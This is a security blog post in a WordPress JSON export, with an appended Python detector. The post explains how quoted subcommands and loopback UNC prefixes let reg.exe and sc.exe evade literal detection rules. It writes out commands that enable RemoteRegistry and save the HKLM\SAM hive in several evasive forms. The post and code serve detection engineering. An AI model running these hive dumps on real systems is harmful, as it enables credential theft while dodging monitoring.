{"id":8979,"date":"2023-12-25T11:15:35","date_gmt":"2023-12-25T11:15:35","guid":{"rendered":"https:\/\/www.hexacorn.com\/blog\/?p=8979"},"modified":"2023-12-25T21:59:35","modified_gmt":"2023-12-25T21:59:35","slug":"2-less-known-secrets-of-windows-command-command-driven-line-tools","status":"publish","type":"post","link":"https:\/\/www.hexacorn.com\/blog\/2023\/12\/25\/2-less-known-secrets-of-windows-command-command-driven-line-tools\/","title":{"rendered":"2 lesser-known secrets of Windows command-driven command-line tools&#8230;"},"content":{"rendered":"\n<p>Many Windows command-line tools take a subcommand as their first argument, e.g.:<\/p>\n\n<ul>\n<li><strong>reg.exe<\/strong> &#8211; QUERY, ADD, DELETE, COPY, SAVE, RESTORE, LOAD, UNLOAD, COMPARE, EXPORT, IMPORT, FLAGS<\/li>\n<li><strong>sc.exe<\/strong> &#8211; config, continue, control, create, delete, description, EnumDepend, failure, failureflag, GetDisplayName, GetKeyName, interrogate, managedaccount, pause, preferrednode, privs, qc, qdescription, qfailure, qfailureflag, qmanagedaccount, qpreferrednode, qprivs, qprotection, qsidtype, qtriggerinfo, query, queryex, quserservice, sdset, sdshow, showsid, sidtype, start, stop, triggerinfo<\/li>\n<li><strong>netsh.exe<\/strong> &#8211; ?, add, advfirewall, branchcache, bridge, delete, dhcpclient, dnsclient, dump, exec, firewall, help, http, interface, ipsec, lan, mbn, namespace, netio, p2p, ras, rpc, set, show, trace, wcn, wfp, winhttp, winsock, wlan<\/li>\n<li><strong>fsutil.exe<\/strong> &#8211; 8dot3name, behavior, dax, dirty, file, fsInfo, hardlink, objectID, quota, repair, reparsePoint, resource, sparse, storageReserve, tiering, transaction, usn, volume, wim<\/li>\n<\/ul>\n\n<p>We are used to invoking them as <em>tool command<\/em>, but the subcommand can also be wrapped in double quotes, e.g.:<\/p>\n\n<ul>\n<li><em>reg.exe &#8220;query&#8221;<\/em> is identical to <em>reg.exe query<\/em><\/li>\n<li><em>sc.exe &#8220;start&#8221;<\/em> is identical to <em>sc start<\/em><\/li>\n<li>etc.<\/li>\n<\/ul>\n\n<p>The quotes never reach the tool: the C runtime splits the command line into <em>argv<\/em> with the same rules as <em>CommandLineToArgvW<\/em> and removes the quotes in the process, so the program receives exactly the same argument either way. The raw command line recorded by Sysmon (Event ID 1), EDR agents and Windows process-creation auditing (Security Event ID 4688 with command-line logging enabled) does keep the quotes, so any rule that matches a literal string such as <em>reg save<\/em> or <em>sc start<\/em> against it misses the quoted form. This breaks many hard-coded detections; rules should match on normalized arguments (quotes stripped), not on the raw string.<\/p>\n\n<p>The second secret is the omnipresent support for everything &#8216;remote&#8217;, that is, operations that can be executed on other endpoints.<\/p>\n\n<p>As such, one can pass computer names to many of these commands; for example, registry keys given to <em>reg.exe<\/em> can be prefixed with a host name. That includes <em>localhost<\/em>, <em>127.0.0.1<\/em> and <em>::1<\/em>, yet notably, for these to work the RemoteRegistry service needs to be running on the local host, because a <em>\\\\host\\<\/em> prefix makes <em>reg.exe<\/em> go through the remote registry interface even when the host is the machine itself. Enabling the service requires administrative rights and is very easy:<\/p>\n\n<pre class=\"wp-block-preformatted\">sc config remoteregistry start= auto\nsc start remoteregistry<\/pre>\n\n<p>and then we can easily run one of these (saving <em>HKLM\\SAM<\/em> also requires administrative rights):<\/p>\n\n<pre class=\"wp-block-preformatted\">reg save \\\\127.0.0.1\\hklm\\sam sam\nreg save \\\\localhost\\hklm\\sam sam\nreg save \\\\::1\\hklm\\sam sam\nreg \"save\" \\\\127.0.0.1\\hklm\\sam sam\nreg \"save\" \\\\localhost\\hklm\\sam sam\nreg \"save\" \\\\::1\\hklm\\sam sam<\/pre>\n\n<p>This will break many detections too: a rule written for <em>reg save hklm\\sam<\/em> does not expect a <em>\\\\host\\<\/em> prefix at all, let alone a loopback one. The preparation is not silent, though. Changing the start type of RemoteRegistry is logged by the Service Control Manager in the System log as Event ID 7040, and the service entering the running state as Event ID 7036, so those two events next to a <em>reg.exe<\/em> launch are worth a rule of their own.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Many Windows command-line tools take a subcommand as their first argument, e.g.: We are used to invoking them as tool command, but the subcommand can also be wrapped in double quotes, e.g.: The quotes never reach the tool, so any rule that matches a literal string against the raw command line misses the quoted form. This breaks many hard-coded detections. 
&hellip; <a href=\"https:\/\/www.hexacorn.com\/blog\/2023\/12\/25\/2-less-known-secrets-of-windows-command-command-driven-line-tools\/\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[79],"tags":[],"_links":{"self":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/8979"}],"collection":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/comments?post=8979"}],"version-history":[{"count":6,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/8979\/revisions"}],"predecessor-version":[{"id":8987,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/8979\/revisions\/8987"}],"wp:attachment":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/media?parent=8979"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/categories?post=8979"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/tags?post=8979"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
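To show what a detection has to do to survive both tricks from the post, here is an added example (not code from the original post or its author): a Python normalizer that splits the raw command line with the same rules as CommandLineToArgvW, folds a \\localhost\, \\127.0.0.1\ or \\::1\ prefix out of the registry key, and then matches reg save/export of HKLM\SAM, SECURITY or SYSTEM. A literal rule of the kind the post says gets broken is included for comparison. The sample command lines are constructed, and the assumption that the rule sees the raw command line as logged by Sysmon Event ID 1 or Security Event ID 4688 is mine.

```python
"""Normalize Windows process command lines before matching a reg.exe rule.

Added example, not code from the original post. It assumes the detection
pipeline sees the raw command line exactly as Sysmon Event ID 1 or Security
Event ID 4688 record it, and it implements a simplified version of the
CommandLineToArgvW splitting rules (double quotes and backslash-escaped
quotes; the program-name special case and the "" inside quotes rule are
left out). The sample command lines at the bottom are constructed.
"""
import re

# Names under which reg.exe reaches its own machine through RemoteRegistry.
LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1"}
# Hives whose offline copies give an attacker local credential material.
CREDENTIAL_HIVES = {"sam", "security", "system"}
# The kind of literal rule the post says the quoted/remote forms slip past.
NAIVE_RULE = re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\sam\b", re.IGNORECASE)


def split_windows_cmdline(cmdline):
    """Split a raw command line into argv the way the CRT/CommandLineToArgvW do.

    Quotes toggle whitespace handling and are removed; 2n backslashes before a
    quote become n backslashes, 2n+1 become n backslashes plus a literal quote;
    backslashes anywhere else are literal (so registry paths survive intact).
    """
    args, cur, in_quotes, have_arg = [], [], False, False
    i, n = 0, len(cmdline)
    while i < n:
        c = cmdline[i]
        if c == "\\":
            j = i
            while j < n and cmdline[j] == "\\":
                j += 1
            run = j - i
            if j < n and cmdline[j] == '"':
                cur.append("\\" * (run // 2))
                if run % 2:              # odd run: the quote is a literal
                    cur.append('"')
                    j += 1
            else:
                cur.append("\\" * run)   # not followed by a quote: literal
            have_arg, i = True, j
        elif c == '"':
            in_quotes, have_arg, i = not in_quotes, True, i + 1
        elif c in " \t" and not in_quotes:
            if have_arg:
                args.append("".join(cur))
                cur, have_arg = [], False
            i += 1
        else:
            cur.append(c)
            have_arg, i = True, i + 1
    if have_arg:
        args.append("".join(cur))
    return args


_UNC_KEY = re.compile(r"^\\\\([^\\]+)\\(.*)$")


def split_registry_target(key_arg):
    """Return (host, key) for a reg.exe key argument; host is None if absent.

    A leading \\host\ makes reg.exe use the remote registry API even when the
    host is the local machine, so the loopback aliases are reported as well.
    """
    m = _UNC_KEY.match(key_arg)
    if not m:
        return None, key_arg
    return m.group(1), m.group(2)


def detect_hive_save(cmdline):
    """Flag reg save/export of a credential hive regardless of quoting or host prefix.

    Returns a dict describing the match, or None when the line is benign.
    """
    argv = split_windows_cmdline(cmdline)
    if len(argv) < 3:
        return None
    exe = argv[0].rsplit("\\", 1)[-1].lower()
    if exe not in ("reg", "reg.exe"):
        return None
    verb = argv[1].lower()
    if verb not in ("save", "export"):
        return None
    host, key = split_registry_target(argv[2])
    parts = key.lower().split("\\")
    if len(parts) < 2 or parts[0] not in ("hklm", "hkey_local_machine"):
        return None
    if parts[1] not in CREDENTIAL_HIVES:
        return None
    return {
        "exe": exe,
        "verb": verb,
        "hive": parts[1],
        "host": host,
        "loopback": host is not None and host.lower() in LOOPBACK_HOSTS,
    }


def naive_match(cmdline):
    """The literal rule, for comparison with the normalized one."""
    return NAIVE_RULE.search(cmdline) is not None


# Constructed sample command lines (not real telemetry).
SAMPLE_CMDLINES = [
    r"reg save hklm\sam sam",
    r'reg "save" \\127.0.0.1\hklm\sam sam',
    r'reg sa"ve" \\localhost\hklm\sam sam',
    r'"C:\Windows\System32\reg.exe" "export" \\::1\HKLM\SECURITY C:\Users\Public\sec.reg',
    r"reg query hklm\software\microsoft",
    r"reg save hklm\software\contoso app.hiv",
    r'sc "start" remoteregistry',
]


def compare_rules(cmdlines=SAMPLE_CMDLINES):
    """Return [(cmdline, naive_hit, normalized_hit)] for each sample line."""
    return [(c, naive_match(c), detect_hive_save(c) is not None) for c in cmdlines]


if __name__ == "__main__":
    for cmdline, naive, normalized in compare_rules():
        print(f"naive={naive!s:5} normalized={normalized!s:5}  {cmdline}")
```

Only the first sample line trips the literal rule; the normalized rule catches all three quoted or loopback-prefixed variants and still ignores the benign `reg query`, the non-credential hive save and the `sc "start"` line. The same normalizer applies to `sc`, `netsh` and `fsutil` subcommands, since the quote stripping happens before the tool ever sees the arguments.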